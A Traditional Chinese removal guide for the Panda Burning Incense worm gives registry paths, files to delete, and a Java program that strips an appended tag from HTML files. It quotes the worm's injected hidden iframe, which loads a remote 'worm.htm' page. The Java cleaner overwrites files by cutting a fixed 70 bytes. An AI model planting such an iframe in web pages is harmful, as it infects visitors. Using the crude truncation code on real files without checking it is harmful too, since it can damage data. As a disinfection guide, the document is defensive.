移除熊貓燒香病毒的步驟如下:
1.  同時按鍵盤Alt + Ctrl + Del叫出工作管理員如下圖。
 
2. 選取 spoclsv.exe(注意不是spoolsv.exe),用滑鼠按 結束處理程序 按鈕。
3. 開始/執行 開啟 regedit.exe 程式 (即登錄編輯程式)
4.
 		 登錄編輯程式執行編輯功能表的尋找指令,以尋找 spoclsv.exe,將找到的項目刪除(按右鍵刪除)。(可以在下列二處找到)
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
5. 將下列登錄參數的值改為0x00000001
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL
CheckedValue---> 0x00000001
 
 
修改的方法是在上圖 CheckedValue 上按右鍵 / 修改,如下圖
6. 開啟我的電腦 / 工具 / 資料夾選項 / 檢視,做如下紅色框線內的設定
 
7.
 		 確定後,可以在每一個磁碟機的根目錄下找到二個隱藏檔autorun.inf 和 setup.exe(如下圖),這就是病毒程式,將其刪除。
  也要記得刪除 X:\WINDOWS\system32\drivers\spoclsv.exe (X代表系統磁碟機)。
 
8. 每一個磁碟機都要執行第7點的動作,包括行動碟。
9.
 

用檔案總管的搜尋功能找出所有檔名為Desktop_.ini 的系統隱藏檔(注意不是Desktop.ini),將其全部刪除,否則使用Acrobat Distiller列印文件時會出現下列訊息:(每一個資料夾包括子資料夾都有,大約有數千個或數萬個檔案)
  %%[ Error: undefined; OffendingCommand: findfont ]%%

Stack:
/Font
/Courier
/courier


%%[ Flushing: rest of job (to end-of-file) will be ignored ]%%
%%[ Warning: PostScript error. No PDF file produced. ] %%

10.
熊貓燒香病毒會在每一個HTML檔案後面附加下列標籤:
<iframe src=http://www.krvkr.com/worm.htm width=0 height=0></iframe>
將下列Java程式編譯並執行,可以移除附加的標籤。
(注意一:下載某些編譯好的解毒程式也有可能會造成中毒,除非你能確定解毒程式是安全的)
(注意二:病毒通常會有變種,請確定您電腦中的病毒是否為上述所敘述的病毒或變種病毒。下列程式不適用變種病毒,您必須要有能力針對變種病毒修改Java程式,否則請勿輕易執行下列程式碼;如果造成損失,作者不負任何責任)

import java.io.*;

public class RemoveVirus {
  static File dir = new File("d:/"); //指定解毒的磁碟機或資料夾
  static int fcount = 0;
  public static void main(String[] args) {
    visitAllFiles(dir);
    System.out.println("Update "+fcount +" HTML files");
  }

  public static void openHtm (String filename){
    byte b[]={'w','w','w','.','k','r','v','k','r'}; //www.krvkr.com
    try {
      FileInputStream fi = new FileInputStream(filename);
      byte ba[] = new byte[fi.available()];
      fi.read(ba);
      if (ba.length <70) { //檔案太短,判斷沒有中毒
        fi.close();
        return;
      }
      int i, j;
      for (i = 51, j = 0; i > 42; i--, j++) { //比對檔案結尾是否有www.krvkr
        if (ba[ba.length - i] != b[j])
          break;
      }
      if (i == 42 ) {
        System.out.println(fcount+ " "+filename + " ");
        fcount ++;
        fi.close(); //關閉中毒檔案

        FileOutputStream fo = new FileOutputStream(filename); //覆寫中毒檔案
        fo.write(ba, 0, ba.length-70);
        fo.close();
      }
      else {
        fi.close(); //關閉未中毒檔案
      }
    }
    catch (IOException e) {
      System.out.println(e.getMessage());
    }
  }

  // 掃描每一個資料夾和子資料夾中的檔案
  public static void visitAllFiles(File dir) {
    if (dir.isDirectory()) {
      try {
        String[] children = dir.list();
        for (int i = 0; i < children.length; i++) {
          visitAllFiles(new File(dir, children[i])); //遞廻呼叫自己
        }
      }
      catch (NullPointerException e) {
        System.out.println(dir.getAbsolutePath());
        System.out.println(e.getMessage());
      }
    }
    else {
      String filename = dir.getAbsoluteFile().getAbsolutePath();
      //找出HTML檔案
      if (filename.toLowerCase().endsWith(".htm") ||
        filename.toLowerCase().endsWith(".asp") ||
        filename.toLowerCase().endsWith(".aspx") ||
        filename.toLowerCase().endsWith(".jsp") ||
        filename.toLowerCase().endsWith(".html"))
          openHtm(filename); //移除附加標籤
    }
  }
}
11. 重新開機。

資料來源:
行政院國家資通安全會報技術服務中心